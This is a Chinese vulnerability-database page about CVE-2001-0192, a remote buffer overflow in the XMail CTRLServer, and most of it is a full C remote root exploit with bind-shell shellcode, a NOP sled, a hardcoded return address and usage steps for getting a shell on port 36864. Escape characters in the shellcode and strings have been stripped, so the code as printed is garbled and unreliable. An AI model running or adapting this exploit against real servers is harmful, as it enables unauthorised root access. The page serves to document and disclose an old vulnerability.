Xmail CTRLServer缓冲区溢出漏洞
| 漏洞ID | 1106194 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2001-02-01 | 更新时间 | 2001-05-03 |
![图片[1]-Xmail CTRLServer缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2001-0192 |
![图片[2]-Xmail CTRLServer缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200105-082 |
| 漏洞平台 | Linux | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
Xmail中CTRLServer存在缓冲区溢出漏洞。攻击者借助cfgfileget或者domaindel函数执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2360/info
Versions of CTRLServer are vulnerable to malicious user-supplied input. A failure to properly bounds-check data passed to the cfgfileget() command leads to an overflow, which, properly exploited, can result in remote execution of malicious code with root privilege.
/*
* XMail CTRLServer remote root exploit for linux/x86
*
* Author: isno([email protected]), 01/2001
*
* NOTE:
* Because the buffer is too small to set many of NOP before shellcode,it
* is deficult to guess ret.And it cannot brute force offset,because once
* sending overflow code to the CTRLServer, XMail will be crashed.
*
*
* Tested on:
* RedHat Linux 6.0 i386 XMail 0.65
*
* Compile:
* gcc -o xmailx xmailx.c
*
* Usage:
* ./xmailx username passwd targethost [offset]
* and telnet targethost 36864
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#define BSIZE 512
#define RETADDRESS 0xbc7fe988 /* maybe 0xbffff9a4 in some box */
#define OFFSET 20
#define NOP 0x90
#define PORT 6017
void usage(char *app);
/* shellcode bind TCP port 36864 */
char shellcode[]=
/* main: */
"xebx72" /* jmp callz */
/* start: */
"x5e" /* popl %esi */
/* socket() */
"x29xc0" /* subl %eax, %eax */
"x89x46x10" /* movl %eax, 0x10(%esi) */
"x40" /* incl %eax */
"x89xc3" /* movl %eax, %ebx */
"x89x46x0c" /* movl %eax, 0x0c(%esi) */
"x40" /* incl %eax */
"x89x46x08" /* movl %eax, 0x08(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* bind() */
"x43" /* incl %ebx */
"xc6x46x10x10" /* movb $0x10, 0x10(%esi) */
"x66x89x5ex14" /* movw %bx, 0x14(%esi) */
"x88x46x08" /* movb %al, 0x08(%esi) */
"x29xc0" /* subl %eax, %eax */
"x89xc2" /* movl %eax, %edx */
"x89x46x18" /* movl %eax, 0x18(%esi) */
"xb0x90" /* movb $0x90, %al */
"x66x89x46x16" /* movw %ax, 0x16(%esi) */
"x8dx4ex14" /* leal 0x14(%esi), %ecx */
"x89x4ex0c" /* movl %ecx, 0x0c(%esi) */
"x8dx4ex08" /* leal 0x08(%esi), %ecx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* listen() */
"x89x5ex0c" /* movl %ebx, 0x0c(%esi) */
"x43" /* incl %ebx */
"x43" /* incl %ebx */
"xb0x66" /* movb $0x66, %al */
"xcdx80" /* int $0x80 */
/* accept() */
"x89x56x0c" /* movl %edx, 0x0c(%esi) */
"x89x56x10" /* movl %edx, 0x10(%esi) */
"xb0x66" /* movb $0x66, %al */
"x43" /* incl %ebx */
"xcdx80" /* int $0x80 */
/* dup2(s, 0); dup2(s, 1); dup2(s, 2); */
"x86xc3" /* xchgb %al, %bl */
"xb0x3f" /* movb $0x3f, %al */
"x29xc9" /* subl %ecx, %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
"xb0x3f" /* movb $0x3f, %al */
"x41" /* incl %ecx */
"xcdx80" /* int $0x80 */
/* execve() */
"x88x56x07" /* movb %dl, 0x07(%esi) */
"x89x76x0c" /* movl %esi, 0x0c(%esi) */
"x87xf3" /* xchgl %esi, %ebx */
"x8dx4bx0c" /* leal 0x0c(%ebx), %ecx */
"xb0x0b" /* movb $0x0b, %al */
"xcdx80" /* int $0x80 */
/* callz: */
"xe8x89xffxffxff" /* call start */
"/bin/sh";
/* 128 bytes */
int main(int argc, char *argv[])
{
char buff[BSIZE+1];
char sendbuf[600]="cfgfilegett";
char loginbuf[200];
char rcvbuf[1024];
char *username;
char *password;
char *target;
int i;
int noprange;
int offset=OFFSET;
u_long sp=RETADDRESS;
u_long addr;
int skt;
long inet;
struct hostent *host;
struct sockaddr_in sin;
if(argc<4)
{
usage(argv[0]);
return 1;
}
username = argv[1];
password = argv[2];
target = argv[3];
if(argc>4)
{
offset = atoi(argv[4]);
}
addr=sp - (long)offset;
noprange=256+4-strlen(shellcode);
memset(buff, NOP, BSIZE);
memcpy(buff+(long)noprange, shellcode, strlen(shellcode));
for (i = 256+4; i < BSIZE; i += 4)
*((int *) &buff[i]) = addr;
buff[BSIZE]='�';
fprintf(stderr, "nUse retAddress: 0x%08xnn",addr);
strcat(sendbuf, buff);
strcat(sendbuf, "rn");
strcpy(loginbuf,username);
strcat(loginbuf,"t"); /* command should splitted by TAB */
strcat(loginbuf,password);
strcat(loginbuf,"rn");
skt = socket(PF_INET, SOCK_STREAM, 0);
if(skt == 0)
{
perror("socket()");
exit(-1);
}
inet = inet_addr(target);
if(inet == -1)
{
if(host = gethostbyname(target))
memcpy(&inet, host->h_addr, 4);
else
inet = -1;
if(inet == -1)
{
fprintf(stderr, "Cant resolv %s!!n", target);
exit (-1);
}
}
sin.sin_family = PF_INET;
sin.sin_port = htons(PORT);
sin.sin_addr.s_addr = inet;
if (connect (skt, (struct sockaddr *)&sin, sizeof(sin)) < 0)
{
perror("Connect()");
exit(-1);
}
read(skt, rcvbuf, 1024);
fprintf(stderr, "%sn", rcvbuf);
memset(rcvbuf, 0x0, 1024);
fprintf(stderr, "Starting to login...n");
write(skt, loginbuf, strlen(loginbuf));
sleep(1);
read(skt, rcvbuf, 1024);
if(strstr(rcvbuf,"00000")==NULL)
{
perror("Login failed!");
exit(-1);
}
write(skt, sendbuf, strlen(sendbuf));
close(skt);
fprintf(stderr, "Success!now telnet %s 36864n", target);
return 1;
}
void usage(char *app)
{
fprintf(stderr, "nXMail 0.65/0.66 CTRLSvr exploitnn");
fprintf(stderr, "Usage: %s username passwd targethost [offset]nn", app);
return;
}
|受影响的产品
Davide Libenzi XMail 0.66
|参考资料
来源:xmailserver.org
链接:http://xmailserver.org/XMail-Readme.txt
来源:BUGTRAQ
名称:20010201XMailCTRLServerremotebufferoverflowvulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0047.html
相关推荐: WircSrv IRC Server Character Flood Denial of Service Vulnerability
WircSrv IRC Server Character Flood Denial of Service Vulnerability 漏洞ID 1103999 漏洞类型 Unknown 发布时间 2000-07-10 更新时间 2000-07-10 CVE编号…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666